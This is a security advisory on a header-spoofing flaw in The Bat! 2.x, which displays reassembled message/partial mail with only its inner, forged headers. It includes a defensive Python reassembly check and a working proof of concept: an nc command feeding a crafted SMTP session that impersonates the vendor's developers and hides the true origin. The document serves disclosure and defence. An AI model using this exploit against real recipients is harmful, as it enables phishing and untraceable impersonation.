Title:            The Bat! 2.x message headers spoofing
Author:           3APA3A <[email protected]>
Vendor:           RitLabs
Vendor's page:    http://thebat.net/
Application:      The Bat 2.x (2.12.04 tested)
Not vulnerable:   The Bat! 3.5
Remote:           Yes, against client
Category:         Information spoofing

Intro:

The Bat! is a very convenient, powerful and (compared with others) secure
MUA (Mail User Agent) with many professional features: templates, macros,
a Bayesian SPAM filter, etc. It is a commercial product from RitLabs.

Vulnerability:

A design flaw in the way The Bat! shows message/partial messages allows an
attacker to spoof the RFC 822 headers of the original message, including
_all_ Received: and Message-ID: fields. This makes it possible to create an
untrackable message and to spoof the message origin, including the sender's
network.

Details:

The Bat! silently re-assembles a partial message and shows the encapsulated
data. The headers shown are those of the encapsulated message; the real
headers are lost completely.
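As an added example (not part of the advisory), the Python below reassembles a message/partial set the way RFC 2046 section 5.2.2.1 requires, keeping the Received: trail and From: that the receiving MTA actually recorded, and reports every header a client that simply displays the encapsulated message would get wrong. The two fragments are constructed sample data, not the exploit file below; note that RFC 2046 itself takes Message-ID: from the enclosed message, so a correct client recovers the outer Received: trail and the other envelope fields, not the Message-ID:.

```python
from email import policy
from email.parser import HeaderParser

# RFC 2046 5.2.2.1: on reassembly only Content-* and these fields are taken
# from the enclosed message; everything else, Received: included, is kept
# from the outer envelope of fragment number 1.
INNER_FIELDS = {"subject", "message-id", "encrypted", "mime-version"}

def _from_inner(name):
    n = name.lower()
    return n.startswith("content-") or n in INNER_FIELDS

# Constructed sample: the outer headers the MTA saw name relay.example.net,
# while the encapsulated message claims to come from the vendor.
FRAG1 = """Received: from relay.example.net ([192.0.2.10]) by mx.example.com
From: someone <sender@example.net>
Content-Type: message/partial; id="frag@example.net"; number=1; total=2

Received: from mail.vendor.example ([203.0.113.5]) by mx.example.com
From: Vendor Developers <support@vendor.example>
Message-ID: <inner@vendor.example>
Content-Type: text/plain

Hello,
"""
FRAG2 = """Received: from relay.example.net ([192.0.2.10]) by mx.example.com
From: someone <sender@example.net>
Content-Type: message/partial; id="frag@example.net"; number=2; total=2

Yours, the vendor.
"""

def reassemble(raw_fragments):
    """Rebuild a message/partial set per RFC 2046; return (headers, body, spoofed)."""
    parser = HeaderParser(policy=policy.default)  # headers only, body kept verbatim
    parts = sorted((parser.parsestr(r) for r in raw_fragments),
                   key=lambda m: int(m["Content-Type"].params["number"]))
    outer = parts[0]
    if (len({m["Content-Type"].params["id"] for m in parts}) != 1
            or len(parts) != int(outer["Content-Type"].params["total"])):
        raise ValueError("incomplete or mixed message/partial set")
    inner = parser.parsestr("".join(m.get_payload() for m in parts))
    headers = [(k, str(v)) for k, v in outer.items() if not _from_inner(k)]
    headers += [(k, str(v)) for k, v in inner.items() if _from_inner(k)]
    spoofed = {}  # header -> (what the MTA recorded, what the inner message claims)
    for name in sorted({k.lower() for k, _ in outer.items() + inner.items()}):
        real = [str(v) for v in outer.get_all(name, [])]
        shown = [str(v) for v in inner.get_all(name, [])]
        if not _from_inner(name) and real != shown:
            spoofed[name] = (real, shown)
    return headers, inner.get_payload(), spoofed
```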

Exploit:

Replace @example.com with the destination address:
nc ip_of_smtp_relay 25 <thebatexploit.txt


-=-=-=-=- begin thebatexploit.txt -=-=-=-=-
HELO example.com
MAIL FROM: <[email protected]>
RCPT TO: <[email protected]>
DATA
Date: Mon, 31 Jan 2006 13:30:00 +0300
From: 3APA3A <[email protected]>
X-Mailer: The Bat! (v2.12.00)
Organization: http://www.security.nnov.ru/
X-Priority: 3 (Normal)
Message-ID: <[email protected]>
To: Phiby <[email protected]>
Subject: Subject: Re[7]: //
Message-ID: <p#[email protected]@thebat.net>
MIME-Version: 1.0
Content-Type: message/partial; id="[email protected]@thebat.net";
        number=1; total=2

Received: from mail.ritlabs.com (mail.ritlabs.com [198.63.208.135])
        by mail.example.com (Postfix) with ESMTP id 9F89619EBEB
        for <[email protected]>; Mon, 31 Jan 2006 13:30:06 +0300 (MSK)
Date: Mon, 31 Jan 2006 13:30:06 +0300
From: The Bat! developers <[email protected]>
X-Mailer: The Bat! (v2.12.00)
Organization: RitLabs
X-Priority: 3 (Normal)
Message-ID: <[email protected]>
To: Phiby <[email protected]>
Subject: Subject: Re[7]: //
MIME-Version: 1.0
Content-Type: text/plain; charset=Windows-1251
Content-Transfer-Encoding: 8bit

Dear Phiby,

Best wishes for you and http://phiby.com/
.
RSET
MAIL FROM: <[email protected]>
RCPT TO: <[email protected]>
DATA
Date: Mon, 30 Jan 2006 13:30:06 +0300
From: 3APA3A <[email protected]>
Organization: http://www.security.nnov.ru/
X-Mailer: The Bat! (v2.12.00)
Organization: Microsoft
X-Priority: 3 (Normal)
Message-ID: <[email protected]>
To: Phiby <[email protected]>
Subject: Subject: Re[7]: //
Message-ID: <p#[email protected]@microsof.com>
MIME-Version: 1.0
Content-Type: message/partial; id="[email protected]@thebat.net";
        number=2; total=2

Yours, The Bat! develpment team.
.
QUIT
-=-=-=-=-  end thebatexploit.txt  -=-=-=-=-

Workaround:

Do not trust the header data The Bat! shows.

Solution:

Upgrade to The Bat! 3.x (not free)